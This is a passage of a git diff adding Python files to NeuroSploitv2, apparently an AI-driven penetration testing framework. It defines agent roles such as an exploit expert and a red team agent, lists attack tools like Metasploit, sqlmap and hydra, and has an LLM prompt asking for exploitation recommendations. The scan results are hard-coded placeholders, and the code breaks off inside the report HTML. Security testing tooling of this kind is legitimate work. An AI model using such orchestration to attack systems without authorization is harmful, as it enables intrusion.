"agent": self.name, + "target": target, + "status": "running", + "findings": [] + } + + try: + # Your custom logic here + # Example: API endpoint testing + results["findings"] = self._scan_api_endpoints(target) + + # Use AI for analysis + ai_analysis = self._ai_analyze(results["findings"]) + results["ai_analysis"] = ai_analysis + + results["status"] = "completed" + + except Exception as e: + logger.error(f"Error in {self.name}: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _scan_api_endpoints(self, target: str) -> list: + """Custom scanning logic""" + # Implement your custom scanning logic + return [ + {"endpoint": "/api/users", "method": "GET", "auth": "required"}, + {"endpoint": "/api/admin", "method": "POST", "auth": "weak"} + ] + + def _ai_analyze(self, findings: list) -> Dict: + """Use AI to analyze findings""" + prompt = f""" +Analyze the following API security findings: + +{findings} + +Provide: +1. Security assessment +2. Risk prioritization +3. Exploitation recommendations +4. Remediation advice + +Response in JSON format. +""" + + system_prompt = "You are an API security expert." 
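+        # NOTE: `findings` is interpolated into the prompt via its default
+        # str() representation; for structured data, json.dumps(findings,
+        # indent=2) would be the more robust choice (left as-is here).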
+
+        try:
+            response = self.llm.generate(prompt, system_prompt)
+            return {"analysis": response}
+        except Exception as e:
+            return {"error": str(e)}
diff --git a/neurosploit.py b/neurosploit.py
new file mode 100644
index 0000000..17b080c
--- /dev/null
+++ b/neurosploit.py
@@ -0,0 +1,357 @@
+#!/usr/bin/env python3
+"""
+NeuroSploitv2 - AI-Powered Penetration Testing Framework
+Author: Security Research Team
+License: MIT
+Version: 2.0.0
+"""
+
+import os
+import sys
+import argparse
+import json
+from pathlib import Path
+from typing import Dict, List, Optional
+import logging
+from datetime import datetime
+
+# Create the log directory before configuring logging: on a fresh checkout,
+# logging.FileHandler('logs/neurosploit.log') would otherwise raise
+# FileNotFoundError because logs/ does not exist yet.
+os.makedirs('logs', exist_ok=True)
+
+# Setup logging
+logging.basicConfig(
+    level=logging.INFO,
+    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
+    handlers=[
+        logging.FileHandler('logs/neurosploit.log'),
+        logging.StreamHandler(sys.stdout)
+    ]
+)
+logger = logging.getLogger(__name__)
+
+from core.llm_manager import LLMManager
+from agents.base_agent import BaseAgent
+
+class NeuroSploitv2:
+    """Main framework class for NeuroSploitv2"""
+
+    def __init__(self, config_path: str = "config/config.json"):
+        """Initialize the framework"""
+        self.config_path = config_path
+        self.config = self._load_config()
+        # Agents are created dynamically per role; no persistent registry is kept.
+        self.session_id = datetime.now().strftime("%Y%m%d_%H%M%S")
+        self._setup_directories()
+
+        # An LLMManager instance is created per agent role so each role can
+        # select its own LLM profile.
+        self.llm_manager_instance: Optional[LLMManager] = None
+
+        logger.info(f"NeuroSploitv2 initialized - Session: {self.session_id}")
+
+    def _setup_directories(self):
+        """Create necessary directories"""
+        dirs = ['logs', 'reports', 'data', 'custom_agents', 'results']
+        for d in dirs:
+            Path(d).mkdir(exist_ok=True)
+
+    def _load_config(self) -> Dict:
+        """Load configuration from file"""
+        if os.path.exists(self.config_path):
+            with open(self.config_path, 'r') as f:
+                return json.load(f)
+        return self._create_default_config()
+
+    def _create_default_config(self) -> Dict:
+        """Create default configuration"""
+        config = {
+            "llm": {
+                "provider": "gemini",
+                "model": "gemini-pro",
+                "api_key": "",
+                "temperature": 0.7,
+                "max_tokens": 4096
+            },
+            # NOTE: the llm_profile names below (e.g. "gemini_pro_default") are
+            # expected to be defined as profiles in a user-supplied "llm"
+            # config section; the minimal default above does not define them.
+            "agent_roles": {
+                "bug_bounty_hunter": {
+                    "enabled": True,
+                    "llm_profile": "gemini_pro_default",
+                    "tools_allowed": ["subfinder", "nuclei", "burpsuite", "sqlmap"],
+                    "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
+                },
+                "blue_team_agent": {
+                    "enabled": True,
+                    "llm_profile": "claude_opus_default",
+                    "tools_allowed": [],
+                    "description": "Analyzes logs and telemetry for threats, provides defensive strategies."
+                },
+                "exploit_expert": {
+                    "enabled": True,
+                    "llm_profile": "gpt_4o_default",
+                    "tools_allowed": ["metasploit", "nmap"],
+                    "description": "Devises exploitation strategies and payloads for identified vulnerabilities."
+                },
+                "red_team_agent": {
+                    "enabled": True,
+                    "llm_profile": "gemini_pro_default",
+                    "tools_allowed": ["nmap", "metasploit", "hydra"],
+                    "description": "Plans and executes simulated attacks to test an organization's defenses."
+                },
+                "replay_attack_specialist": {
+                    "enabled": True,
+                    "llm_profile": "ollama_llama3_default",
+                    "tools_allowed": ["burpsuite"],
+                    "description": "Identifies and leverages replay attack vectors in network traffic or authentication."
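+                # The remaining roles follow the same shape: an llm_profile
+                # name plus a tool whitelist that BaseAgent exposes via
+                # get_allowed_tools().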
+                },
+                "pentest_generalist": {
+                    "enabled": True,
+                    "llm_profile": "gemini_pro_default",
+                    "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"],
+                    "description": "Performs comprehensive penetration tests across various domains."
+                },
+                "owasp_expert": {
+                    "enabled": True,
+                    "llm_profile": "gemini_pro_default",
+                    "tools_allowed": ["burpsuite", "sqlmap"],
+                    "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
+                },
+                "cwe_expert": {
+                    "enabled": True,
+                    "llm_profile": "claude_opus_default",
+                    "tools_allowed": [],
+                    "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
+                },
+                "malware_analyst": {
+                    "enabled": True,
+                    "llm_profile": "gpt_4o_default",
+                    "tools_allowed": [],
+                    "description": "Examines malware samples to understand functionality and identify IOCs."
+                }
+            },
+            "methodologies": {
+                "owasp_top10": True,
+                "cwe_top25": True,
+                "network_pentest": True,
+                "ad_pentest": True,
+                "web_security": True
+            },
+            "tools": {
+                "nmap": "/usr/bin/nmap",
+                "metasploit": "/usr/bin/msfconsole",
+                "burpsuite": "/usr/bin/burpsuite",
+                "sqlmap": "/usr/bin/sqlmap",
+                "hydra": "/usr/bin/hydra"
+            },
+            "output": {
+                "format": "json",
+                "verbose": True,
+                "save_artifacts": True
+            }
+        }
+
+        # Save default config
+        os.makedirs(os.path.dirname(self.config_path), exist_ok=True)
+        with open(self.config_path, 'w') as f:
+            json.dump(config, f, indent=4)
+
+        logger.info(f"Created default configuration at {self.config_path}")
+        return config
+
+    def _initialize_llm_manager(self, agent_llm_profile: Optional[str] = None):
+        """Initialize LLMManager with a specific profile, or the default one."""
+        llm_config = self.config.get('llm', {})
+        if agent_llm_profile:
+            # Temporarily swap the default profile so LLMManager picks up the
+            # requested one at construction time, then restore it.
+            original_default = llm_config.get('default_profile')
+            llm_config['default_profile'] = agent_llm_profile
+            self.llm_manager_instance = LLMManager({"llm": llm_config})
+            llm_config['default_profile'] = original_default  # Restore original default
+        else:
+            self.llm_manager_instance = LLMManager({"llm": llm_config})
+
+    def execute_agent_role(self, agent_role_name: str, user_input: str, additional_context: Optional[Dict] = None):
+        """Execute a specific agent role with the given input."""
+        logger.info(f"Starting execution for agent role: {agent_role_name}")
+
+        agent_roles_config = self.config.get('agent_roles', {})
+        role_config = agent_roles_config.get(agent_role_name)
+
+        if not role_config:
+            logger.error(f"Agent role '{agent_role_name}' not found in configuration.")
+            return {"error": f"Agent role '{agent_role_name}' not found."}
+
+        if not role_config.get('enabled', False):
+            logger.warning(f"Agent role '{agent_role_name}' is disabled in configuration.")
+            return {"warning": f"Agent role '{agent_role_name}' is disabled."}
+
+        # .get() avoids a KeyError when the config defines no default_profile
+        # (the generated default config does not).
+        llm_profile_name = role_config.get('llm_profile', self.config['llm'].get('default_profile'))
+        self._initialize_llm_manager(llm_profile_name)
+
+        if not self.llm_manager_instance:
+            logger.error("LLM Manager could not be initialized.")
+            return {"error": "LLM Manager initialization failed."}
+
+        # Get the prompts for the selected agent role; agent_role_name is
+        # assumed to map directly to the .md filename in the prompt library.
+        agent_prompts = self.llm_manager_instance.prompts.get("md_prompts", {}).get(agent_role_name)
+        if not agent_prompts:
+            logger.error(f"Prompts for agent role '{agent_role_name}' not found in MD library.")
+            return {"error": f"Prompts for agent role '{agent_role_name}' not found."}
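+        # From here on, behavior is data-driven: BaseAgent combines the full
+        # framework config with this role's prompt pair, so adding a new role
+        # requires only config and prompt entries, not a new subclass.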
+        # Instantiate and execute the BaseAgent
+        agent_instance = BaseAgent(agent_role_name, self.config, self.llm_manager_instance, agent_prompts)
+
+        results = agent_instance.execute(user_input, additional_context)
+
+        # Save results
+        campaign_results = {
+            "session_id": self.session_id,
+            "agent_role": agent_role_name,
+            "input": user_input,
+            "timestamp": datetime.now().isoformat(),
+            "results": results
+        }
+        self._save_results(campaign_results)
+        return campaign_results
+
+    def _save_results(self, results: Dict):
+        """Save campaign results"""
+        output_file = f"results/campaign_{self.session_id}.json"
+        with open(output_file, 'w') as f:
+            json.dump(results, f, indent=4)
+        logger.info(f"Results saved to {output_file}")
+
+        # Generate report
+        self._generate_report(results)
+
+    def _generate_report(self, results: Dict):
+        """Generate an HTML report for the agent role execution"""
+        report_file = f"reports/report_{self.session_id}.html"
+
+        html = f"""
+<html>
+<head>
+    <title>NeuroSploitv2 Report - {results['session_id']}</title>
+</head>
+<body>
+    <h1>NeuroSploitv2 Campaign Report</h1>
+    <p><b>Agent Role:</b> {results.get('agent_role', 'N/A')}</p>
+    <p><b>Input:</b> {results.get('input', 'N/A')}</p>
+    <p><b>Session:</b> {results['session_id']}</p>
+    <p><b>Timestamp:</b> {results['timestamp']}</p>
+    <pre>{json.dumps(results.get('results', {}), indent=2)}</pre>